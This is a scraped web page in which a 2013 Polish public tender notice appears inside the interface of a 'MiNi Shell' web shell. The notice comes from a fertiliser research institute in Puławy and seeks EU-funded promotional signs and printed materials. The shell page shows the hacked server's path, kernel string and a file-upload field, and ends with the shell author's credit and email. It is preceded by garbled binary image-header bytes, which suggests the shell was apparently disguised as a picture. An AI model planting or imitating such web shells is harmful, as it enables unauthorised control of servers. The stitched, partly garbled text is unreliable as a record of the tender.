JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131105/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131105/231887-N-2013.html

<p class="kh_header"><b>Puławy: Wykonanie artykułów promocyjnych dla potrzeb projektu ,Budowa i wyposażenie Centrum Badawczego Nawozów, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013.</b><br>
<b>Numer ogłoszenia: 231887 - 2013; data zamieszczenia: 05.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Nawozów Sztucznych , Aleja Tysiąclecia Państwa Polskiego 13A, 24-110 Puławy, woj. lubelskie, tel. 81 473 14 00, faks 81 473 14 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ins.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytut badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie artykułów promocyjnych dla potrzeb projektu ,Budowa i wyposażenie Centrum Badawczego Nawozów, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: wykonanie artykułów promocyjnych dla potrzeb projektu Budowa i wyposażenie Centrum Badawczego Nawozów, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Rozwój Polski Wschodniej, zgodnie z poniższym wykazem:

a)Tablice informacyjne o wymiarach 2,4 m x 2,4 m- szt. 2, wykonane z blachy ocynkowanej lub równoważnej, z obramowaniem oraz konstrukcją usztywniającą po stronie tylnej umożliwiającą zawieszenie na ścianie budynku lub wolnostojącej konstrukcji wsporczej, wszystkie znaki i napisy- pełny kolor, druk wykonany na folii samoprzylepnej, zabezpieczenie druku z folii PCV bezbarwnej.

Tablica informacyjna powinna zawierać elementy wymienione poniżej:
- emblemat Unii Europejskiej,
- odwołanie słowne do Unii Europejskiej
- odwołanie słowne do Europejskiego Funduszu Rozwoju Regionalnego,
- logo Programu Operacyjnego Rozwój Polski Wschodniej,
- hasło promocyjne Programu Operacyjnego Rozwój Polski Wschodniej -Fundusze
 Europejskie dla rozwoju Polski Wschodniej.
- logo Instytutu Nawozów Sztucznych

Informacje te powinny zajmować co najmniej 25% powierzchni tablicy i być zgodne z logotypami opisanymi w dokumencie Zasady promocji projektów w ramach Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013, udostępnianymi przez Zamawiającego wraz ze SIWZ.

Na tablicy należy również umieścić:
- tytuł projektu: Budowa i wyposażenie Centrum Badawczego Nawozów
- nazwę Beneficjenta: Instytut Nawozów Sztucznych
- wartość projektu: 17 654 692,20 PLN
- poziom dofinansowania z Europejskiego Funduszu Rozwoju Regionalnego: 12 975 876,00 PLN
- okres realizacji projektu: IX 2011 - XII 2014
- zapis Projekt współfinansowany ze środków Unii Europejskiej w ramach Programu
 Operacyjnego Rozwój Polski Wschodniej 2007-2013.

Z uwagi na fakt, że tablice będą zlokalizowane na zewnątrz wszystkie napisy i znaki powinny być odporne na warunki pogodowe. 
 
b) Tablica pamiątkowa o wymiarach 1m x 0,7 m- szt.1, dwustronna, wykonana z blachy ocynkowanej lubrównoważnej, z obramowaniem oraz konstrukcją usztywniającą po stronie tylnej umożliwiającą zawieszenie na ścianie budynku lub na wolnostojącej konstrukcji wsporczej, wszystkie znaki i napisy pełny kolor, druk wykonany na folii samoprzylepnej, zabezpieczenie druku z folii PCV bezbarwnej.

Tablica pamiątkowa powinna zawierać elementy wymienione poniżej:
- emblemat Unii Europejskiej,
- odwołanie słowne do Unii Europejskiej
- odwołanie słowne do Europejskiego Funduszu Rozwoju Regionalnego,
- logo Programu Operacyjnego Rozwój Polski Wschodniej 2007- 2013
- hasło promocyjne Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013,
 -Fundusze Europejskie dla rozwoju Polski Wschodniej.

Informacje wymienione wyżej powinny zajmować co najmniej 25% powierzchni tablicy, być zgodne z logotypami opisanymi w dokumencie Zasady promocji projektów w ramach Programu Operacyjnego Rozwój Polski Wschodniej 2007 - 2013, udostępnianymi przez Zamawiającego wraz ze SIWZ. 

Ponadto tablica ta powinna zawierać: 

- logo Instytutu Nawozów Sztucznych, 
-zapis Projekt współfinansowany ze środków Unii Europejskiej w ramach Programu
 Operacyjnego Rozwój Polski Wschodniej 2007 - 2013.
-	tytuł projektu Budowa i wyposażenie Centrum Badawczego Nawozów. 
Tablica powinna mieć charakter trwały, a wszystkie napisy i znaki powinny być odporne na warunki pogodowe. 

c) Ulotki reklamowe - 1000 szt.
- format 10 cm x 21 cm, pełny kolor, papier: kreda błyszcząca 300g, druk dwustronny, 
-obligatoryjne umieszczenie następujących symboli: emblemat Unii Europejskiej, odwołanie słowne do Unii Europejskiej, odwołanie słowne do Europejskiego Funduszu Rozwoju Regionalnego, logo Programu Operacyjnego Rozwój Polski Wschodniej 2007 - 2013, hasło promocyjne Programu Operacyjnego Rozwój Polski Wschodniej 2007 - 2013 - Fundusze Europejskie - dla rozwoju Polski Wschodniej, zapis Projekt współfinansowany ze środków Unii Europejskiej w ramach Programu Operacyjnego Rozwój Polski Wschodniej 2007 - 2013, logo Instytutu Nawozów Sztucznych, pełna nazwa Instytutu Nawozów Sztucznych,  tytuł projektu Budowa i wyposażenie Centrum Badawczego Nawozów. Pozostała treść ulotki informacyjnej zostanie uzgodniona z Zamawiającym na etapie przygotowywania projektu graficznego. 

d) Naklejki informacyjne - szt. 100 
- format 15 cm x 21 cm, pełny kolor, wykonane z folii samoprzylepnej, 
- obligatoryjne umieszczenie następujących symboli: emblemat Unii Europejskiej, odwołanie słowne do Unii Europejskiej, odwołanie słowne do Europejskiego Funduszu Rozwoju Regionalnego, logo Programu Operacyjnego Rozwój Polski Wschodniej 2007 - 2013, hasło promocyjne Programu Operacyjnego Rozwój Polski Wschodniej 2007 - 2013 - Fundusze Europejskie - dla rozwoju Polski Wschodniej, zapis zakup dokonany ze środków Unii Europejskiej w ramach Programu Operacyjnego Rozwój Polski Wschodniej 2007 - 2013, logo Instytutu Nawozów Sztucznych, tytuł projektu Budowa i wyposażenie Centrum Badawczego Nawozów. 

e) Naklejki informacyjne - szt. 50
- format 2,5 cm x 17,5 cm, pełny kolor, wykonane z papieru samoprzylepnego błyszczącego, 
-obligatoryjne umieszczenie następujących symboli: emblemat Unii Europejskiej, odwołanie słowne do Unii Europejskiej, odwołanie słowne do Europejskiego Funduszu Rozwoju Regionalnego, logo Programu Operacyjnego Rozwój Polski Wschodniej 2007 - 2013, hasło promocyjne Programu Operacyjnego Rozwój Polski Wschodniej 2007 - 2013 - Fundusze Europejskie - dla rozwoju Polski Wschodniej.

f) Tabliczki informacyjne na drzwi - szt. 5
- format 20,5 cm x 14,5 cm, pełny kolor, materiał PCV; grubość 2 mm, z nadrukiem, zgodnie z poniższym zapisem: obligatoryjne umieszczenie następujących symboli: emblemat Unii Europejskiej, odwołanie słowne do Unii Europejskiej, odwołanie słowne do Europejskiego Funduszu Rozwoju Regionalnego, logo Programu Operacyjnego Rozwój Polski Wschodniej 2007 - 2013, hasło promocyjne Programu Operacyjnego Rozwój Polski Wschodniej 2007 - 2013 - Fundusze Europejskie - dla rozwoju Polski Wschodniej, logo Instytutu Nawozów Sztucznych, napis: Biuro Projektu; Budowa i wyposażenie Centrum Badawczego Nawozów.
- nadruk ma być zabezpieczony matową folią bezbarwną.

Zakres prac Wykonawcy obejmuje: 
a) Wykonanie projektu graficznego każdego z artykułów będących przedmiotem przetargu, 
b) Uzgodnienie projektu graficznego z Zamawiającym, 
c) Wykonanie zamówionych artykułów, zgodnie z zatwierdzonym projektem..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość wystąpienia zamówień uzupełniających do wysokości 10% wartości zamówienia podstawowego - na podstawie art. 67 ust. 1 pkt. 7 ustawy prawo zamówień publicznych.
Zamówienie uzupełniające zostanie wynegocjowane i będzie realizowane oddzielnie od zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.70-3, 22.14.00.00-3, 30.19.97.60-5, 22.46.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunki udziału w postępowaniu zostaną spełnione, jeżeli: wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli wykonawca działa krócej, w tym okresie) wykonał należycie co najmniej:
a)dla części nr 1 -  1 usługę polegającą za zaprojektowaniu i wykonaniu tablic informacyjnych o wartości co najmniej 8.000,00 PLN netto,
b)dla części Nr 2 - 1 usługę polegającą na wykonaniu drukowanych materiałów promocyjnych o wartości co najmniej 5.000,00 PLN netto 
z podaniem wartości, przedmiotu, dat wykonania oraz podmiotów, na rzecz których usługa została wykonana wraz z dowodami potwierdzającymi należyte jej wykonanie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany umowy w następującym zakresie:
1)zmiany stawki i kwoty podatku VAT oraz wynagrodzenia brutto określonych w Artykule 2;
2)zmniejszenia zakresu przedmiotu zamówienia, gdy jego wykonanie w pierwotnym zakresie nie leży w interesie Zamawiającego;
3) zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a) gdy wykonanie zamówienia w określonym pierwotnym terminie nie leży w interesie Zamawiającego; 
a)działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie; 
2. Zmiany umowy przewidziane w ust. 1 dopuszczalne są w następujących warunkach:
ad 1) stawka i kwota podatku VAT oraz wynagrodzenie brutto ulegną zmianie odpowiednio do treści przepisów wprowadzających zmianę;
ad 2) zmniejszenie zakresu przedmiotu umowy w granicach uzasadnionego interesu Zamawiającego;
ad 3)  zmiana terminu realizacji zamówienia:
lit a) - o okres umożliwiający osiągnięcie uzasadnionego interesu Zamawiającego 
lit b  - o okres działania siły wyższej oraz potrzebny do usunięcia skutków jej działania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ins.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Nawozów Sztucznych
Al. Tysiąclecia Państwa Polskiego 13A
24-110 Puławy,
Budynek G35, pokój 201.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2013 godzina 10:00, miejsce: Instytut Nawozów Sztucznych
Al. Tysiąclecia Państwa Polskiego 13A
24-110 Puławy,
Budynek E40, Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Tablice informacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tablice informacyjne - szt 2
Tablica pamiątkowa - sz 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.70-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Artykuły promocyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)ulotki reklamowe -szt 1000
b)naklejki informacyjne - szt 100
c)naklejki informacyjne - szt 50
d)tabliczki informacyjne na drzwi -szt 5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.14.00.00-3, 30.19.97.60-5, 22.46.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com